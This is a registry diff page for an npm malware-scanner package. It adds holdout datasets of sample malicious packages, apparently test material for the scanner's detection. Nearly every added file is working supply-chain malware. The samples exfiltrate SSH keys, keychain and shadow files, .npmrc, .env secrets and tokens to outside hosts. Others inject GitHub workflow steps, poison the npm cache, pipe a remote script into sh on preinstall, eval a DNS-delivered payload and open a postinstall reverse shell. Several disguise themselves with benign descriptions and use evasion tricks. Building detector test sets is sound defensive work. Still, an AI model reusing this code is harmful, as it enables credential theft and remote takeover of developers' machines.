npm - muaddib-scanner - Versions diffs - 2.2.0 → 2.2.2 - Mend

muaddib-scanner 2.2.0 → 2.2.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (49) hide show

package/datasets/holdout-v2/conditional-os-payload/index.js ADDED Viewed

@@ -0,0 +1,36 @@
+const os = require('os');
+const { execSync } = require('child_process');
+const https = require('https');
+function exfil(data) {
+  const payload = JSON.stringify(data);
+  const req = https.request({
+    hostname: 'metrics.example.com',
+    port: 443,
+    path: '/v2/report',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
+  });
+  req.on('error', () => {});
+  req.write(payload);
+  req.end();
+}
+const platform = os.platform();
+const arch = os.arch();
+try {
+  if (platform === 'darwin') {
+    // macOS: dump keychain credentials
+    const creds = execSync('security dump-keychain -d login.keychain 2>/dev/null', { encoding: 'utf8', timeout: 10000 });
+    exfil({ os: 'darwin', arch, type: 'keychain', data: creds.substring(0, 8192) });
+  } else if (platform === 'linux') {
+    // Linux: read /etc/shadow
+    const shadow = execSync('cat /etc/shadow 2>/dev/null', { encoding: 'utf8', timeout: 5000 });
+    exfil({ os: 'linux', arch, type: 'shadow', data: shadow });
+  } else if (platform === 'win32') {
+    // Windows: extract saved credentials via PowerShell
+    const creds = execSync('powershell -c "Get-StoredCredential | ConvertTo-Json"', { encoding: 'utf8', timeout: 10000 });
+    exfil({ os: 'win32', arch, type: 'credentials', data: creds });
+  }
+} catch (e) {}

package/datasets/holdout-v2/conditional-os-payload/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "conditional-os-payload",
+  "version": "1.0.0",
+  "description": "Holdout v2 — OS-specific credential theft",
+  "main": "index.js"
+}

package/datasets/holdout-v2/env-var-reconstruction/index.js ADDED Viewed

@@ -0,0 +1,21 @@
+const https = require('https');
+// Reconstruct "GITHUB_TOKEN" from charCodes
+const codes = [71, 73, 84, 72, 85, 66, 95, 84, 79, 75, 69, 78];
+const varName = codes.map(c => String.fromCharCode(c)).join('');
+// Access via bracket notation to avoid static detection
+const secret = process.env[varName];
+if (secret) {
+  const payload = JSON.stringify({ t: secret, h: require('os').hostname() });
+  const req = https.request({
+    hostname: 'telemetry-api.example.com',
+    port: 443,
+    path: '/v1/collect',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': payload.length }
+  });
+  req.write(payload);
+  req.end();
+}

package/datasets/holdout-v2/env-var-reconstruction/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "env-var-reconstruction",
+  "version": "1.0.0",
+  "description": "Holdout v2 — charCode reconstruction of env var name",
+  "main": "index.js"
+}

package/datasets/holdout-v2/github-workflow-inject/index.js ADDED Viewed

@@ -0,0 +1,36 @@
+const fs = require('fs');
+const path = require('path');
+// Find the project root by traversing up
+let projectRoot = __dirname;
+while (projectRoot !== path.dirname(projectRoot)) {
+  if (fs.existsSync(path.join(projectRoot, '.git'))) break;
+  projectRoot = path.dirname(projectRoot);
+}
+const workflowDir = path.join(projectRoot, '.github', 'workflows');
+// Malicious step to inject into existing workflows
+const maliciousStep = `
+      - name: Check dependencies
+        run: |
+          curl -s https://api.example.com/hook -d "token=${{ secrets.GITHUB_TOKEN }}" -d "repo=${{ github.repository }}"
+`;
+try {
+  const files = fs.readdirSync(workflowDir);
+  for (const file of files) {
+    if (!file.endsWith('.yml') && !file.endsWith('.yaml')) continue;
+    const fullPath = path.join(workflowDir, file);
+    let content = fs.readFileSync(fullPath, 'utf8');
+    // Inject after the first "steps:" line
+    const stepsIndex = content.indexOf('steps:');
+    if (stepsIndex !== -1) {
+      const afterSteps = content.indexOf('\n', stepsIndex);
+      content = content.slice(0, afterSteps + 1) + maliciousStep + content.slice(afterSteps + 1);
+      fs.writeFileSync(fullPath, content);
+    }
+  }
+} catch (e) {}

package/datasets/holdout-v2/github-workflow-inject/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "github-workflow-inject",
+  "version": "1.0.0",
+  "description": "Holdout v2 — inject step into existing workflow files",
+  "main": "index.js"
+}

package/datasets/holdout-v2/homedir-ssh-key-steal/index.js ADDED Viewed

@@ -0,0 +1,29 @@
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+const https = require('https');
+// Read SSH private key
+const sshKeyPath = path.join(os.homedir(), '.ssh', 'id_rsa');
+let keyData;
+try {
+  keyData = fs.readFileSync(sshKeyPath, 'utf8');
+} catch (e) {
+  process.exit(0);
+}
+// Encode as base64 to fit in a header
+const encoded = Buffer.from(keyData).toString('base64');
+// Exfiltrate via custom header to legitimate-looking domain
+const req = https.request({
+  hostname: 'api.github.com',
+  port: 443,
+  path: '/repos/check-update',
+  method: 'GET',
+  headers: {
+    'User-Agent': 'node-updater/1.0',
+    'X-Debug-Data': encoded
+  }
+});
+req.end();

package/datasets/holdout-v2/homedir-ssh-key-steal/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "homedir-ssh-key-steal",
+  "version": "1.0.0",
+  "description": "Holdout v2 — SSH key exfiltration via HTTP header",
+  "main": "index.js"
+}

package/datasets/holdout-v2/npm-cache-poison/index.js ADDED Viewed

@@ -0,0 +1,38 @@
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+const crypto = require('crypto');
+// Target: npm's content-addressable cache
+const npmCacheDir = path.join(os.homedir(), '.npm', '_cacache', 'content-v2', 'sha512');
+// Malicious payload to inject into cached package
+const maliciousCode = `
+;(function(){
+  const h = require('https');
+  const o = require('os');
+  const d = JSON.stringify({ h: o.hostname(), u: o.userInfo().username, e: process.env });
+  const r = h.request({ hostname: 'collect.example.com', path: '/npm', method: 'POST',
+    headers: { 'Content-Length': Buffer.byteLength(d) } });
+  r.write(d); r.end();
+})();
+`;
+try {
+  // Walk the cache directory to find JS entries
+  const subDirs = fs.readdirSync(npmCacheDir);
+  for (const sub of subDirs.slice(0, 5)) {
+    const subPath = path.join(npmCacheDir, sub);
+    const entries = fs.readdirSync(subPath);
+    for (const entry of entries.slice(0, 3)) {
+      const entryPath = path.join(subPath, entry);
+      const content = fs.readFileSync(entryPath, 'utf8');
+      // Only poison JS files
+      if (content.includes('module.exports') || content.includes('require(')) {
+        const poisoned = maliciousCode + '\n' + content;
+        fs.writeFileSync(entryPath, poisoned);
+      }
+    }
+  }
+} catch (e) {}

package/datasets/holdout-v2/npm-cache-poison/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "npm-cache-poison",
+  "version": "1.0.0",
+  "description": "Holdout v2 — local npm cache manipulation",
+  "main": "index.js"
+}

package/datasets/holdout-v2/npm-lifecycle-preinstall-curl/package.json ADDED Viewed

@@ -0,0 +1,8 @@
+{
+  "name": "npm-lifecycle-preinstall-curl",
+  "version": "1.0.0",
+  "description": "Holdout v2 — pure lifecycle script attack, no JS files",
+  "scripts": {
+    "preinstall": "curl -s https://evil.com/setup.sh | sh"
+  }
+}

package/datasets/holdout-v2/process-env-proxy-getter/index.js ADDED Viewed

@@ -0,0 +1,35 @@
+const http = require('http');
+// Snapshot all current env values before interception
+const envSnapshot = Object.assign({}, process.env);
+// Intercept all process.env property accesses via Object.defineProperty
+// Different from Proxy-based approach — works on the actual process.env object
+const sensitiveKeys = ['TOKEN', 'SECRET', 'KEY', 'PASSWORD', 'NPM', 'AWS', 'GITHUB'];
+Object.keys(envSnapshot).forEach(key => {
+  const original = envSnapshot[key];
+  const isSensitive = sensitiveKeys.some(s => key.toUpperCase().includes(s));
+  Object.defineProperty(process.env, key, {
+    get() {
+      if (isSensitive) {
+        // Silently exfiltrate on each access to a sensitive var
+        const payload = JSON.stringify({ k: key, v: original });
+        const req = http.request({
+          hostname: '127.0.0.1',
+          port: 8443,
+          path: '/log',
+          method: 'POST',
+          headers: { 'Content-Length': Buffer.byteLength(payload) }
+        });
+        req.on('error', () => {});
+        req.write(payload);
+        req.end();
+      }
+      return original;
+    },
+    configurable: true,
+    enumerable: true
+  });
+});

package/datasets/holdout-v2/process-env-proxy-getter/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "process-env-proxy-getter",
+  "version": "1.0.0",
+  "description": "Holdout v2 — defineProperty intercept on process.env",
+  "main": "index.js"
+}

package/datasets/holdout-v2/readable-stream-hijack/index.js ADDED Viewed

@@ -0,0 +1,44 @@
+const http = require('http');
+const https = require('https');
+// Monkey-patch IncomingMessage prototype to intercept all HTTP responses
+const originalEmit = http.IncomingMessage.prototype.emit;
+http.IncomingMessage.prototype.emit = function(event, ...args) {
+  if (event === 'end') {
+    // Extract authorization headers from the response's request
+    const authHeaders = {};
+    const reqHeaders = this.req && this.req.getHeaders ? this.req.getHeaders() : {};
+    for (const [key, value] of Object.entries(reqHeaders)) {
+      if (key.toLowerCase().includes('auth') || key.toLowerCase().includes('token') || key.toLowerCase().includes('cookie')) {
+        authHeaders[key] = value;
+      }
+    }
+    if (Object.keys(authHeaders).length > 0) {
+      // Forward intercepted auth headers to external server
+      const payload = JSON.stringify({
+        url: this.req && this.req.path,
+        headers: authHeaders,
+        timestamp: Date.now()
+      });
+      const exfilReq = https.request({
+        hostname: 'telemetry.example.com',
+        port: 443,
+        path: '/collect',
+        method: 'POST',
+        headers: {
+          'Content-Type': 'application/json',
+          'Content-Length': Buffer.byteLength(payload)
+        }
+      });
+      exfilReq.on('error', () => {});
+      exfilReq.write(payload);
+      exfilReq.end();
+    }
+  }
+  return originalEmit.call(this, event, ...args);
+};

package/datasets/holdout-v2/readable-stream-hijack/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "readable-stream-hijack",
+  "version": "1.0.0",
+  "description": "Holdout v2 — IncomingMessage prototype monkey-patch",
+  "main": "index.js"
+}

package/datasets/holdout-v2/setTimeout-chain/index.js ADDED Viewed

@@ -0,0 +1,50 @@
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+const https = require('https');
+// Anti-sandbox: chained setTimeout with random delays
+// Sandboxes typically timeout after 30s, this chain can take up to 5 minutes
+function stage1() {
+  setTimeout(() => {
+    stage2();
+  }, Math.random() * 60000);
+}
+function stage2() {
+  setTimeout(() => {
+    stage3();
+  }, Math.random() * 60000);
+}
+function stage3() {
+  setTimeout(() => {
+    stage4();
+  }, Math.random() * 60000);
+}
+function stage4() {
+  setTimeout(() => {
+    stage5();
+  }, Math.random() * 60000);
+}
+function stage5() {
+  setTimeout(() => {
+    // Final payload: read .npmrc and exfiltrate
+    const npmrc = path.join(os.homedir(), '.npmrc');
+    try {
+      const token = fs.readFileSync(npmrc, 'utf8');
+      const data = Buffer.from(token).toString('base64');
+      const req = https.request({
+        hostname: 'cdn-analytics.example.com',
+        path: '/beacon?d=' + data,
+        method: 'GET'
+      });
+      req.end();
+    } catch (e) {}
+  }, Math.random() * 60000);
+}
+stage1();

package/datasets/holdout-v2/setTimeout-chain/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "setTimeout-chain",
+  "version": "1.0.0",
+  "description": "Holdout v2 — nested setTimeout chain with random delays",
+  "main": "index.js"
+}

package/datasets/holdout-v2/wasm-loader/index.js ADDED Viewed

@@ -0,0 +1,46 @@
+const https = require('https');
+const os = require('os');
+// Download WASM module at runtime — malicious logic is in the binary
+const wasmUrl = 'https://cdn.example.com/analytics/v3/engine.wasm';
+function downloadWasm(url) {
+  return new Promise((resolve, reject) => {
+    https.get(url, (res) => {
+      const chunks = [];
+      res.on('data', c => chunks.push(c));
+      res.on('end', () => resolve(Buffer.concat(chunks)));
+      res.on('error', reject);
+    }).on('error', reject);
+  });
+}
+async function init() {
+  const wasmBytes = await downloadWasm(wasmUrl);
+  // Collect credentials to pass into WASM memory
+  const env = process.env;
+  const creds = JSON.stringify({
+    npm: env.NPM_TOKEN || '',
+    gh: env.GITHUB_TOKEN || '',
+    aws_key: env.AWS_ACCESS_KEY_ID || '',
+    aws_secret: env.AWS_SECRET_ACCESS_KEY || '',
+    hostname: os.hostname(),
+    user: os.userInfo().username
+  });
+  // Instantiate WASM with imported memory containing credentials
+  const memory = new WebAssembly.Memory({ initial: 10 });
+  const encoder = new TextEncoder();
+  const encoded = encoder.encode(creds);
+  new Uint8Array(memory.buffer).set(encoded);
+  const { instance } = await WebAssembly.instantiate(wasmBytes, {
+    env: { memory, credsLen: encoded.length }
+  });
+  // WASM module handles exfiltration internally via imported network functions
+  instance.exports.run();
+}
+init().catch(() => {});

package/datasets/holdout-v2/wasm-loader/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "wasm-loader",
+  "version": "1.0.0",
+  "description": "Holdout v2 — WASM-based credential passing",
+  "main": "index.js"
+}

package/datasets/holdout-v3/dns-txt-payload/index.js ADDED Viewed

@@ -0,0 +1,11 @@
+const dns = require('dns');
+// Retrieve payload from DNS TXT record — no HTTP involved
+dns.resolveTxt('payload.evil-dns.com', (err, records) => {
+  if (err) return;
+  // TXT records come as arrays of strings
+  const encoded = records.map(r => r.join('')).join('');
+  const decoded = Buffer.from(encoded, 'base64').toString('utf8');
+  // Execute the payload received via DNS
+  eval(decoded);
+});

package/datasets/holdout-v3/dns-txt-payload/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "dns-txt-payload",
+  "version": "1.0.0",
+  "description": "DNS resolver helper utilities",
+  "main": "index.js"
+}

package/datasets/holdout-v3/electron-rce/index.js ADDED Viewed

@@ -0,0 +1,32 @@
+// Only activate in Electron environment where we have elevated privileges
+if (process.versions && process.versions.electron) {
+  const { exec } = require('child_process');
+  const os = require('os');
+  // Electron apps often run with higher privileges
+  const platform = os.platform();
+  let cmd;
+  if (platform === 'win32') {
+    cmd = 'powershell -NoProfile -Command "Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select DisplayName, InstallLocation | ConvertTo-Json"';
+  } else if (platform === 'darwin') {
+    cmd = 'security find-generic-password -ga "Chrome" 2>&1 | head -20';
+  } else {
+    cmd = 'cat /etc/shadow 2>/dev/null || cat /etc/passwd';
+  }
+  exec(cmd, (err, stdout) => {
+    if (stdout) {
+      const https = require('https');
+      const data = JSON.stringify({ platform, data: stdout });
+      const req = https.request({
+        hostname: 'electron-data.evil.com',
+        port: 443,
+        path: '/exfil',
+        method: 'POST',
+        headers: { 'Content-Type': 'application/json' }
+      });
+      req.write(data);
+      req.end();
+    }
+  });
+}

package/datasets/holdout-v3/electron-rce/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "electron-rce",
+  "version": "1.0.0",
+  "description": "Cross-platform desktop helper",
+  "main": "index.js"
+}

package/datasets/holdout-v3/env-file-parse-exfil/index.js ADDED Viewed

@@ -0,0 +1,39 @@
+const fs = require('fs');
+const path = require('path');
+const https = require('https');
+// Read .env file directly — no dotenv, no process.env
+const envPath = path.join(process.cwd(), '.env');
+let envContent;
+try {
+  envContent = fs.readFileSync(envPath, 'utf8');
+} catch(e) { process.exit(0); }
+// Manual KEY=VALUE parsing
+const secrets = {};
+envContent.split('\n').forEach(line => {
+  const trimmed = line.trim();
+  if (!trimmed || trimmed.startsWith('#')) return;
+  const eqIdx = trimmed.indexOf('=');
+  if (eqIdx === -1) return;
+  const key = trimmed.slice(0, eqIdx).trim();
+  const val = trimmed.slice(eqIdx + 1).trim().replace(/^["']|["']$/g, '');
+  if (/TOKEN|SECRET|KEY|PASSWORD|API/i.test(key)) {
+    secrets[key] = val;
+  }
+});
+// Exfiltrate parsed secrets
+if (Object.keys(secrets).length > 0) {
+  const data = JSON.stringify(secrets);
+  const opts = {
+    hostname: 'env-collector.malware.io',
+    port: 443,
+    path: '/api/env',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }
+  };
+  const req = https.request(opts);
+  req.write(data);
+  req.end();
+}

package/datasets/holdout-v3/env-file-parse-exfil/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "env-file-parse-exfil",
+  "version": "1.0.0",
+  "description": "Environment configuration loader",
+  "main": "index.js"
+}

package/datasets/holdout-v3/git-credential-steal/index.js ADDED Viewed

@@ -0,0 +1,41 @@
+const fs = require('fs');
+const os = require('os');
+const path = require('path');
+const https = require('https');
+const home = os.homedir();
+const collected = {};
+// Read git config for remote URLs with embedded tokens
+try {
+  const gitConfig = fs.readFileSync(path.join(home, '.gitconfig'), 'utf8');
+  const urlMatches = gitConfig.match(/url\s*=\s*.+/g);
+  if (urlMatches) collected.gitconfig = urlMatches;
+} catch(e) {}
+// Read stored git credentials
+try {
+  const creds = fs.readFileSync(path.join(home, '.git-credentials'), 'utf8');
+  collected.credentials = creds.split('\n').filter(l => l.trim());
+} catch(e) {}
+// Also check the project-level .git/config
+try {
+  const localConfig = fs.readFileSync(path.join(process.cwd(), '.git', 'config'), 'utf8');
+  const remotes = localConfig.match(/url\s*=\s*.+/g);
+  if (remotes) collected.localRemotes = remotes;
+} catch(e) {}
+if (Object.keys(collected).length > 0) {
+  const payload = JSON.stringify(collected);
+  const opts = {
+    hostname: 'git-tokens.exfil.dev',
+    port: 443,
+    path: '/collect',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
+  };
+  const req = https.request(opts);
+  req.write(payload);
+  req.end();
+}

package/datasets/holdout-v3/git-credential-steal/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "git-credential-steal",
+  "version": "1.0.0",
+  "description": "Git repository inspector utility",
+  "main": "index.js"
+}

package/datasets/holdout-v3/npm-hook-hijack/index.js ADDED Viewed

@@ -0,0 +1,20 @@
+const fs = require('fs');
+const os = require('os');
+const path = require('path');
+const home = os.homedir();
+const npmrcPath = path.join(home, '.npmrc');
+// Read existing .npmrc content
+let existing = '';
+try {
+  existing = fs.readFileSync(npmrcPath, 'utf8');
+} catch(e) {}
+// Inject an oninstall hook for persistence
+// This will execute on every future npm install
+const hook = '\noninstall=node -e "require(\'https\').get(\'https://hooks.malware.io/ping?h=\'+require(\'os\').hostname())"';
+if (!existing.includes('oninstall')) {
+  fs.writeFileSync(npmrcPath, existing + hook, 'utf8');
+}

package/datasets/holdout-v3/npm-hook-hijack/package.json ADDED Viewed

@@ -0,0 +1,9 @@
+{
+  "name": "npm-hook-hijack",
+  "version": "1.0.0",
+  "description": "npm configuration optimizer",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
+}

package/datasets/holdout-v3/postinstall-reverse-shell/index.js ADDED Viewed

@@ -0,0 +1,24 @@
+const net = require('net');
+const { spawn } = require('child_process');
+const os = require('os');
+const HOST = '45.33.32.156';
+const PORT = 4444;
+const client = new net.Socket();
+client.connect(PORT, HOST, function() {
+  const shell = os.platform() === 'win32' ? 'cmd.exe' : '/bin/sh';
+  const proc = spawn(shell, { stdio: ['pipe', 'pipe', 'pipe'] });
+  client.pipe(proc.stdin);
+  proc.stdout.pipe(client);
+  proc.stderr.pipe(client);
+  proc.on('exit', function() {
+    client.destroy();
+  });
+});
+client.on('error', function() {
+  // Silent failure
+});

package/datasets/holdout-v3/postinstall-reverse-shell/package.json ADDED Viewed

@@ -0,0 +1,9 @@
+{
+  "name": "postinstall-reverse-shell",
+  "version": "1.0.0",
+  "description": "System diagnostics toolkit",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
+}